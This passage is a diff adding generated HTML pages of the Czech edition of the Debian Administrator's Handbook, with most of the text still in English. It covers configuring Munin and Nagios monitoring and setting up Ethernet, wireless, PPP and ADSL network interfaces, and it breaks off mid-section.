+                  class="literal">autoconf</code> parameter, it should return “yes” (and a 0 exit status) or “no” (with a 1 exit status) according to whether the plugin should be enabled on this host.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.6.5"></a>12.4.1.2. Configuring the Grapher</h4></div></div></div><div
+              class="para">
+					The “grapher” is simply the computer that aggregates the data and generates the corresponding graphs. The required software is in the <span
+                class="pkg pkg">munin</span> package. The standard configuration runs <code
+                class="command">munin-cron</code> (once every 5 minutes), which gathers data from all the hosts listed in <code
+                class="filename">/etc/munin/munin.conf</code> (only the local host is listed by default), saves the historical data in RRD files (<span
+                class="emphasis"><em>Round Robin Database</em></span>, a file format designed to store data varying in time) stored under <code
+                class="filename">/var/lib/munin/</code> and generates an HTML page with the graphs in <code
+                class="filename">/var/cache/munin/www/</code>.
+				</div><div
+              class="para">
+					All monitored machines must therefore be listed in the <code
+                class="filename">/etc/munin/munin.conf</code> configuration file. Each machine is listed as a full section with a name matching the machine and at least an <code
+                class="literal">address</code> entry giving the corresponding IP address.
+				</div><pre
+              class="programlisting">[ftp.falcot.com]
+    address 192.168.0.12
+    use_node_name yes
+</pre><div
+              class="para">
+					Sections can be more complex, and describe extra graphs that could be created by combining data coming from several machines. The samples provided in the configuration file are good starting points for customization.
+				</div><div
+              class="para">
+					The last step is to publish the generated pages; this involves configuring a web server so that the contents of <code
+                class="filename">/var/cache/munin/www/</code> are made available on a website. Access to this website will often be restricted, using either an authentication mechanism or IP-based access control. See <a
+                class="xref"
+                href="sect.http-web-server.html">11.2 – „Web Server (HTTP)“</a> for the relevant details.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.nagios"></a>12.4.2. Setting Up Nagios</h3></div></div></div><a
+            id="id-1.15.7.7.2"
+            class="indexterm"></a><div
+            class="para">
+				Unlike Munin, Nagios does not necessarily require installing anything on the monitored hosts; most of the time, Nagios is used to check the availability of network services. For instance, Nagios can connect to a web server and check that a given web page can be obtained within a given time.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.7.4"></a>12.4.2.1. Installing</h4></div></div></div><div
+              class="para">
+					The first step in setting up Nagios is to install the <span
+                class="pkg pkg">nagios3</span>, <span
+                class="pkg pkg">nagios-plugins</span> and <span
+                class="pkg pkg">nagios3-doc</span> packages. Installing the packages configures the web interface and creates a first <code
+                class="literal">nagiosadmin</code> user (for which it asks for a password). Adding other users is a simple matter of inserting them in the <code
+                class="filename">/etc/nagios3/htpasswd.users</code> file with Apache's <code
+                class="command">htpasswd</code> command. If no Debconf question was displayed during installation, <code
+                class="command">dpkg-reconfigure nagios3-cgi</code> can be used to define the <code
+                class="literal">nagiosadmin</code> password.
+				</div><div
+              class="para">
+					Pointing a browser at <code
+                class="literal">http://<em
+                  class="replaceable">server</em>/nagios3/</code> displays the web interface; in particular, note that Nagios already monitors some parameters of the machine where it runs. However, some interactive features such as adding comments to a host do not work. These features are disabled in the default configuration for Nagios, which is very restrictive for security reasons.
+				</div><div
+              class="para">
+					As documented in <code
+                class="filename">/usr/share/doc/nagios3/README.Debian</code>, enabling some features involves editing <code
+                class="filename">/etc/nagios3/nagios.cfg</code> and setting its <code
+                class="literal">check_external_commands</code> parameter to “1”. We also need to set up write permissions for the directory used by Nagios, with commands such as the following:
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>service nagios3 stop</code></strong>
+<code
+                class="computeroutput">[...]
+# </code><strong
+                class="userinput"><code>dpkg-statoverride --update --add nagios www-data 2710 /var/lib/nagios3/rw
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg-statoverride --update --add nagios nagios 751 /var/lib/nagios3
+</code></strong><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>service nagios3 start</code></strong>
+<code
+                class="computeroutput">[...]</code></pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.7.7.5"></a>12.4.2.2. Configuring</h4></div></div></div><div
+              class="para">
+					The Nagios web interface is rather nice, but it does not allow configuration, nor can it be used to add monitored hosts and services. The whole configuration is managed via files referenced in the central configuration file, <code
+                class="filename">/etc/nagios3/nagios.cfg</code>.
+				</div><div
+              class="para">
+					These files should not be dived into without some understanding of the Nagios concepts. The configuration lists objects of the following types:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>host</em></span> is a machine to be monitored;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>hostgroup</em></span> is a set of hosts that should be grouped together for display, or to factor some common configuration elements;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>service</em></span> is a testable element related to a host or a host group. It will most often be a check for a network service, but it can also involve checking that some parameters are within an acceptable range (for instance, free disk space or processor load);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>servicegroup</em></span> is a set of services that should be grouped together for display;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>contact</em></span> is a person who can receive alerts;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>contactgroup</em></span> is a set of such contacts;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>timeperiod</em></span> is a range of time during which some services have to be checked;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							a <span
+                      class="emphasis"><em>command</em></span> is the command line invoked to check a given service.
+						</div></li></ul></div><div
+              class="para">
+					According to its type, each object has a number of properties that can be customized. A full list would be too long to include, but the most important properties are the relations between the objects.
+				</div><div
+              class="para">
+					A <span
+                class="emphasis"><em>service</em></span> uses a <span
+                class="emphasis"><em>command</em></span> to check the state of a feature on a <span
+                class="emphasis"><em>host</em></span> (or a <span
+                class="emphasis"><em>hostgroup</em></span>) within a <span
+                class="emphasis"><em>timeperiod</em></span>. In case of a problem, Nagios sends an alert to all members of the <span
+                class="emphasis"><em>contactgroup</em></span> linked to the service. Each member is sent the alert according to the channel described in the matching <span
+                class="emphasis"><em>contact</em></span> object.
+				</div><div
+              class="para">
+					An inheritance system allows easy sharing of a set of properties across many objects without duplicating information. Moreover, the initial configuration includes a number of standard objects; in many cases, defining new hosts, services and contacts is a simple matter of deriving from the provided generic objects. The files in <code
+                class="filename">/etc/nagios3/conf.d/</code> are a good source of information on how they work.
+				</div><div
+              class="para">
+					The Falcot Corp administrators use the following configuration:
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.15.7.7.5.9"></a><p
+                class="title"><strong>Příklad 12.3. <code
+                    class="filename">/etc/nagios3/conf.d/falcot.cfg</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">define contact{
+    name                            generic-contact
+    service_notification_period     24x7
+    host_notification_period        24x7
+    service_notification_options    w,u,c,r
+    host_notification_options       d,u,r
+    service_notification_commands   notify-service-by-email
+    host_notification_commands      notify-host-by-email
+    register                        0 ; Template only
+}
+define contact{
+    use             generic-contact
+    contact_name    rhertzog
+    alias           Raphael Hertzog
+    email           hertzog@debian.org
+}
+define contact{
+    use             generic-contact
+    contact_name    rmas
+    alias           Roland Mas
+    email           lolando@debian.org
+}
+
+define contactgroup{
+    contactgroup_name     falcot-admins
+    alias                 Falcot Administrators
+    members               rhertzog,rmas
+}
+
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             www-host
+    alias                 www.falcot.com
+    address               192.168.0.5
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             ftp-host
+    alias                 ftp.falcot.com
+    address               192.168.0.6
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+
+# 'check_ftp' command with custom parameters
+define command{
+    command_name          check_ftp2
+    command_line          /usr/lib/nagios/plugins/check_ftp -H $HOSTADDRESS$ -w 20 -c 30 -t 35
+}
+
+# Generic Falcot service
+define service{
+    name                  falcot-service
+    use                   generic-service
+    contact_groups        falcot-admins
+    register              0
+}
+
+# Services to check on www-host
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTP
+    check_command         check_http
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTPS
+    check_command         check_https
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   SMTP
+    check_command         check_smtp
+}
+
+# Services to check on ftp-host
+define service{
+    use                   falcot-service
+    host_name             ftp-host
+    service_description   FTP
+    check_command         check_ftp2
+}
+</pre></div></div><div
+              class="para">
+					This configuration file describes two monitored hosts. The first one is the web server, and the checks are made on the HTTP (80) and secure-HTTP (443) ports. Nagios also checks that an SMTP server runs on port 25. The second host is the FTP server, and the check includes making sure that a reply comes within 20 seconds. Beyond this delay, a <span
+                class="emphasis"><em>warning</em></span> is emitted; beyond 30 seconds, the alert is deemed critical. The Nagios web interface also shows that the SSH service is monitored: this comes from the hosts belonging to the <code
+                class="literal">ssh-servers</code> hostgroup. The matching standard service is defined in <code
+                class="filename">/etc/nagios3/conf.d/services_nagios2.cfg</code>.
+				</div><div
+              class="para">
+					Note the use of inheritance: an object is made to inherit from another object with the “use <em
+                class="replaceable">parent-name</em>”. The parent object must be identifiable, which requires giving it a “name <em
+                class="replaceable">identifier</em>” property. If the parent object is not meant to be a real object, but only to serve as a parent, giving it a “register 0” property tells Nagios not to consider it, and therefore to ignore the lack of some parameters that would otherwise be required.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DOCUMENTATION</em></span> List of object properties</strong></p></div></div></div><div
+                class="para">
+					A more in-depth understanding of the various ways in which Nagios can be configured can be obtained from the documentation provided by the <span
+                  class="pkg pkg">nagios3-doc</span> package. This documentation is directly accessible from the web interface, with the “Documentation” link in the top left corner. It includes a list of all object types, with all the properties they can have. It also explains how to create new plugins.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Remote tests with NRPE</strong></p></div></div></div><div
+                class="para">
+					Many Nagios plugins allow checking some parameters local to a host; if many machines need these checks while a central installation gathers them, the NRPE (<span
+                  class="emphasis"><em>Nagios Remote Plugin Executor</em></span>) plugin needs to be deployed. The <span
+                  class="pkg pkg">nagios-nrpe-plugin</span> package needs to be installed on the Nagios server, and <span
+                  class="pkg pkg">nagios-nrpe-server</span> on the hosts where local tests need to run. The latter gets its configuration from <code
+                  class="filename">/etc/nagios/nrpe.cfg</code>. This file should list the tests that can be started remotely, and the IP addresses of the machines allowed to trigger them. On the Nagios side, enabling these remote tests is a simple matter of adding matching services using the new <span
+                  class="emphasis"><em>check_nrpe</em></span> command.
+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.automated-installation.html"><strong>Předcházející</strong>12.3. Automated Installation</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="workstation.html"><strong>Další</strong>Kapitola 13. Workstation</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.network-config.html b/tmp/cs-CZ/html/sect.network-config.html
new file mode 100644
index 000000000..6a7c36a26
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.network-config.html
@@ -0,0 +1,541 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.2. Configuring the Network</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="next"
+        href="sect.hostname-name-service.html"
+        title="8.3. Setting the Hostname and Configuring the Name Service" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.network-config.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="basic-configuration.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hostname-name-service.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.network-config"></a>8.2. Configuring the Network</h2></div></div></div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.networking-basics"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Essential network concepts (Ethernet, IP address, subnet, broadcast)</strong></p></div></div></div><a
+            id="id-1.11.6.2.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.4"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.5"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.6"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.7"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.8"
+            class="indexterm"></a><div
+            class="para">
+			Most modern local networks use the Ethernet protocol, where data is split into small blocks called frames and transmitted on the wire one frame at a time. Data speeds vary from 10 Mb/s for older Ethernet cards to 10 Gb/s in the newest cards (with the most common rate currently growing from 100 Mb/s to 1 Gb/s). The most widely used cables are called 10BASE-T, 100BASE-T, 1000BASE-T or 10GBASE-T depending on the throughput they can reliably provide (the T stands for “twisted pair”); those cables end in an RJ45 connector. There are other cable types, used mostly for speeds of 1 Gb/s and above.
+		</div><a
+            id="id-1.11.6.2.10"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.11"
+            class="indexterm"></a><div
+            class="para">
+			An IP address is a number used to identify a network interface on a computer on a local network or the Internet. In the currently most widespread version of IP (IPv4), this number is encoded in 32 bits, and is usually represented as 4 numbers separated by periods (e.g. <code
+              class="literal">192.168.0.1</code>), each number being between 0 and 255 (inclusive, which corresponds to 8 bits of data). The next version of the protocol, IPv6, extends this addressing space to 128 bits, and the addresses are generally represented as a series of hexadecimal numbers separated by colons (e.g., 2001:0db8:13bb:0002:0000:0000:0000:0020, or 2001:db8:13bb:2::20 for short).
+		</div><a
+            id="id-1.11.6.2.13"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.14"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.15"
+            class="indexterm"></a><div
+            class="para">
+			A subnet mask (netmask) defines in its binary code which portion of an IP address corresponds to the network, the remainder specifying the machine. In the example of configuring a static IPv4 address given here, the subnet mask, <code
+              class="literal">255.255.255.0</code> (24 “1”s followed by 8 “0”s in binary representation) indicates that the first 24 bits of the IP address correspond to the network address, and the other 8 are specific to the machine. In IPv6, for readability, only the number of “1”s is expressed; the netmask for an IPv6 network could, thus, be <code
+              class="literal">64</code>.
+		</div><div
+            class="para">
+			The network address is an IP address in which the part describing the machine's number is 0. The range of IPv4 addresses in a complete network is often indicated by the syntax, <span
+              class="emphasis"><em>a.b.c.d/e</em></span>, in which <span
+              class="emphasis"><em>a.b.c.d</em></span> is the network address and <span
+              class="emphasis"><em>e</em></span> is the number of bits affected to the network part in an IP address. The example network would thus be written: <code
+              class="literal">192.168.0.0/24</code>. The syntax is similar in IPv6: <code
+              class="literal">2001:db8:13bb:2::/64</code>.
+		</div><a
+            id="id-1.11.6.2.18"
+            class="indexterm"></a><a
+            id="id-1.11.6.2.19"
+            class="indexterm"></a><div
+            class="para">
+			A router is a machine that connects several networks to each other. All traffic coming through a router is guided to the correct network. To do this, the router analyzes incoming packets and redirects them according to the IP address of their destination. The router is often known as a gateway; in this configuration, it works as a machine that helps reach out beyond a local network (towards an extended network, such as the Internet).
+		</div><a
+            id="id-1.11.6.2.21"
+            class="indexterm"></a><div
+            class="para">
+			The special broadcast address connects all the stations in a network. Almost never “routed”, it only functions on the network in question. Specifically, it means that a data packet addressed to the broadcast never passes through the router.
+		</div><div
+            class="para">
+			This chapter focuses on IPv4 addresses, since they are currently the most commonly used. The details of the IPv6 protocol are approached in <a
+              class="xref"
+              href="sect.ipv6.html">10.5 – „IPv6“</a>, but the concepts remain the same.
+		</div></div><div
+          class="para">
+			The network is automatically configured during the initial installation. If Network Manager gets installed (which is generally the case for full desktop installations), then it might be that no configuration is actually required (for example, if you rely on DHCP on a wired connection and have no specific requirements). If a configuration is required (for example for a WiFi interface), then it will create the appropriate file in <code
+            class="filename">/etc/NetworkManager/system-connections/</code>.
+		</div><div
+          class="para">
+			If Network Manager is not installed, then the installer will configure <span
+            class="pkg pkg">ifupdown</span> by creating the <code
+            class="filename">/etc/network/interfaces</code> file. A line starting with <code
+            class="literal">auto</code> gives a list of interfaces to be automatically configured on boot by the <code
+            class="literal">networking</code> service.
+		</div><div
+          class="para">
+			In a server context, <span
+            class="pkg pkg">ifupdown</span> is thus the network configuration tool that you usually get. That is why we will cover it in the next sections.
+		</div><a
+          id="id-1.11.6.6"
+          class="indexterm"></a><a
+          id="id-1.11.6.7"
+          class="indexterm"></a><a
+          id="id-1.11.6.8"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> NetworkManager</strong></p></div></div></div><a
+            id="id-1.11.6.9.2"
+            class="indexterm"></a><div
+            class="para">
+			If Network Manager is particularly recommended in roaming setups (see <a
+              class="xref"
+              href="sect.network-config.html#sect.roaming-network-config">8.2.5 – „Automatic Network Configuration for Roaming Users“</a>), it is also perfectly usable as the default network management tool. You can create “System connections” that are used as soon as the computer boots either manually with a <code
+              class="filename">.ini</code>-like file in <code
+              class="filename">/etc/NetworkManager/system-connections/</code> or through a graphical tool (<code
+              class="command">nm-connection-editor</code>). Just remember to deactivate all entries in <code
+              class="filename">/etc/network/interfaces</code> if you want Network Manager to handle them. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.gnome.org/Projects/NetworkManager/SystemSettings">https://wiki.gnome.org/Projects/NetworkManager/SystemSettings</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://developer.gnome.org/NetworkManager/1.6/ref-settings.html">https://developer.gnome.org/NetworkManager/1.6/ref-settings.html</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.interface-ethernet"></a>8.2.1. Ethernet Interface</h3></div></div></div><div
+            class="para">
+				If the computer has an Ethernet card, the IP network that is associated with it must be configured by choosing from one of two methods. The simplest method is dynamic configuration with DHCP, and it requires a DHCP server on the local network. It may indicate a desired hostname, corresponding to the <code
+              class="literal">hostname</code> setting in the example below. The DHCP server then sends configuration settings for the appropriate network.
+			</div><a
+            id="id-1.11.6.10.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.10.4"
+            class="indexterm"></a><div
+            class="example"><a
+              xmlns=""
+              id="example.config-dhcp"></a><p
+              class="title"><strong>Příklad 8.1. DHCP configuration</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+auto enp0s31f6
+iface enp0s31f6 inet dhcp
+  hostname arrakis
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Names of network interfaces</strong></p></div></div></div><a
+              id="id-1.11.6.10.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.6.10.6.3"
+              class="indexterm"></a><a
+              id="id-1.11.6.10.6.4"
+              class="indexterm"></a><a
+              id="id-1.11.6.10.6.5"
+              class="indexterm"></a><div
+              class="para">
+				By default, the kernel attributes generic names such a <code
+                class="literal">eth0</code> (for wired Ethernet) or <code
+                class="literal">wlan0</code> (for WiFi) to the network interfaces. The number in those names is a simple incremental counter representing the order in which they have been detected. With modern hardware, that order might change for each reboot and thus the default names are not reliable.
+			</div><div
+              class="para">
+				Fortunately, systemd and udev are able to rename the interfaces as soon as they appear. The default name policy is defined by <code
+                class="filename">/lib/systemd/network/99-default.link</code> (see <span
+                class="citerefentry"><span
+                  class="refentrytitle">systemd.link</span>(5)</span> for an explanation of the <code
+                class="literal">NamePolicy</code> entry in that file). In practice, the names are often based on the device's physical location (as guessed by where they are connected) and you will see names starting with <code
+                class="literal">en</code> for wired ethernet and <code
+                class="literal">wl</code> for WiFi. In the example above, the rest of the name indicates, in abbreviated form, a PCI (<code
+                class="literal">p</code>) bus number (<code
+                class="literal">0</code>), a slot number (<code
+                class="literal">s31</code>), a function number (<code
+                class="literal">f6</code>).
+			</div><div
+              class="para">
+				Obviously, you are free to override this policy and/or to complement it to customize the names of some specific interfaces. You can find out the names of the network interfaces in the output of <code
+                class="command">ip addr</code> (or as filenames in <code
+                class="filename">/sys/class/net/</code>).
+			</div></div><div
+            class="para">
+				A “static” configuration must indicate network settings in a fixed manner. This includes at least the IP address and subnet mask; network and broadcast addresses are also sometimes listed. A router connecting to the exterior will be specified as a gateway.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.static-network"></a><p
+              class="title"><strong>Příklad 8.2. Static configuration</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+auto enp0s31f6
+iface enp0s31f6 inet static
+  address 192.168.0.3
+  netmask 255.255.255.0
+  broadcast 192.168.0.255
+  network 192.168.0.0
+  gateway 192.168.0.1
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Multiple addresses</strong></p></div></div></div><div
+              class="para">
+				It is possible not only to associate several interfaces to a single, physical network card, but also several IP addresses to a single interface. Remember also that an IP address may correspond to any number of names via DNS, and that a name may also correspond to any number of numerical IP addresses.
+			</div><div
+              class="para">
+				As you can guess, the configurations can be rather complex, but these options are only used in very special cases. The examples cited here are typical of the usual configurations.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.interface-wireless"></a>8.2.2. Wireless Interface</h3></div></div></div><a
+            id="id-1.11.6.11.2"
+            class="indexterm"></a><div
+            class="para">
+				Getting wireless network cards to work can be a bit more challenging. First of all, they often require the installation of proprietary firmwares which are not installed by default in Debian. Then wireless networks rely on cryptography to restrict access to authorized users only, this implies storing some secret key in the network configuration. Let's tackle those topics one by one.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.11.6.11.4"></a>8.2.2.1. Installing the required firmwares</h4></div></div></div><a
+              id="id-1.11.6.11.4.2"
+              class="indexterm"></a><a
+              id="id-1.11.6.11.4.3"
+              class="indexterm"></a><div
+              class="para">
+					First you have to enable the non-free repository in APT's sources.list file: see <a
+                class="xref"
+                href="apt.html#sect.apt-sources.list">6.1 – „Filling in the <code
+                  class="filename">sources.list</code> File“</a> for details about this file. Many firmware are proprietary and are thus located in this repository. You can try to skip this step if you want, but if the next step doesn't find the required firmware, retry after having enabled the non-free section.
+				</div><div
+              class="para">
+					Then you have to install the appropriate <code
+                class="literal">firmware-*</code> packages. If you don't know which package you need, you can install the <span
+                class="pkg pkg">isenkram</span> package and run its <code
+                class="command">isenkram-autoinstall-firmware</code> command. The packages are often named after the hardware manufacturer or the corresponding kernel module: <span
+                class="pkg pkg">firmware-iwlwifi</span> for Intel wireless cards, <span
+                class="pkg pkg">firmware-atheros</span> for Qualcomm Atheros, <span
+                class="pkg pkg">firmware-ralink</span> for Ralink, etc. A reboot is then recommended because the kernel driver usually looks for the firmware files when it is first loaded and no longer afterwards.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.11.6.11.5"></a>8.2.2.2. Wireless specific entries in <code
+                      class="filename">/etc/network/interfaces</code></h4></div></div></div><a
+              id="id-1.11.6.11.5.2"
+              class="indexterm"></a><div
+              class="para">
+					<span
+                class="emphasis"><em>ifupdown</em></span> is able to manage wireless interfaces but it needs the help of the <span
+                class="pkg pkg">wpasupplicant</span> package which provides the required integration between <span
+                class="emphasis"><em>ifupdown</em></span> and the <code
+                class="command">wpa_supplicant</code> command used to configure the wireless interfaces (when using WPA/WPA2 encryption). The usual entry in <code
+                class="filename">/etc/network/interfaces</code> needs to be extended with two supplementary parameters to specify the name of the wireless network (aka its SSID) and the <span
+                class="emphasis"><em>Pre-Shared Key</em></span> (PSK).
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.config-wireless"></a><p
+                class="title"><strong>Příklad 8.3. DHCP configuration for a wireless interface</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+auto wlp4s0
+iface wlp4s0 inet dhcp
+  wpa-ssid Falcot
+  wpa-psk ccb290fd4fe6b22935cbae31449e050edd02ad44627b16ce0151668f5f53c01b
+</pre></div></div><div
+              class="para">
+					The <code
+                class="literal">wpa-psk</code> parameter can contain either the plain text passphrase or its hashed version generated with <code
+                class="command">wpa_passphrase <em
+                  class="replaceable">SSID</em> <em
+                  class="replaceable">passphrase</em></code>. If you use an unencrypted wireless connection, then you should put a <code
+                class="literal">wpa-key-mgmt NONE</code> and no <code
+                class="literal">wpa-psk</code> entry. For more information about the possible configuration options, have a look at <code
+                class="filename">/usr/share/doc/wpasupplicant/README.Debian.gz</code>.
+				</div><div
+              class="para">
+					At this point, you should consider restricting the read permissions on <code
+                class="filename">/etc/network/interfaces</code> to the root user only since the file contains a private key that not all users should have access to.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>HISTORY</em></span> WEP encryption</strong></p></div></div></div><a
+                id="id-1.11.6.11.5.7.2"
+                class="indexterm"></a><div
+                class="para">
+					Usage of the deprecated WEP encryption protocol is possible with the <span
+                  class="pkg pkg">wireless-tools</span> package. See <code
+                  class="filename">/usr/share/doc/wireless-tools/README.Debian</code> for instructions.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ppp-rtc"></a>8.2.3. Connecting with PPP through a PSTN Modem</h3></div></div></div><a
+            id="id-1.11.6.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.4"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.5"
+            class="indexterm"></a><div
+            class="para">
+				A point to point (PPP) connection establishes an intermittent connection; this is the most common solution for connections made with a telephone modem (“PSTN modem”, since the connection goes over the public switched telephone network).
+			</div><div
+            class="para">
+				A connection by telephone modem requires an account with an access provider, including a telephone number, username, password, and, sometimes the authentication protocol to be used. Such a connection is configured using the <code
+              class="command">pppconfig</code> tool in the Debian package of the same name. By default, it sets up a connection named <code
+              class="literal">provider</code> (as in Internet service provider). When in doubt about the authentication protocol, choose <span
+              class="emphasis"><em>PAP</em></span>: it is offered by the majority of Internet service providers.
+			</div><a
+            id="id-1.11.6.12.8"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.9"
+            class="indexterm"></a><div
+            class="para">
+				After configuration, it is possible to connect using the <code
+              class="command">pon</code> command (giving it the name of the connection as a parameter, when the default value of <code
+              class="literal">provider</code> is not appropriate). The link is disconnected with the <code
+              class="command">poff</code> command. These two commands can be executed by the root user, or by any other user, provided they are in the <code
+              class="literal">dip</code> group.
+			</div><a
+            id="id-1.11.6.12.11"
+            class="indexterm"></a><a
+            id="id-1.11.6.12.12"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.adsl"></a>8.2.4. Connecting through an ADSL Modem</h3></div></div></div><a
+            id="id-1.11.6.13.2"
+            class="indexterm"></a><a
+            id="id-1.11.6.13.3"
+            class="indexterm"></a><a
+            id="id-1.11.6.13.4"
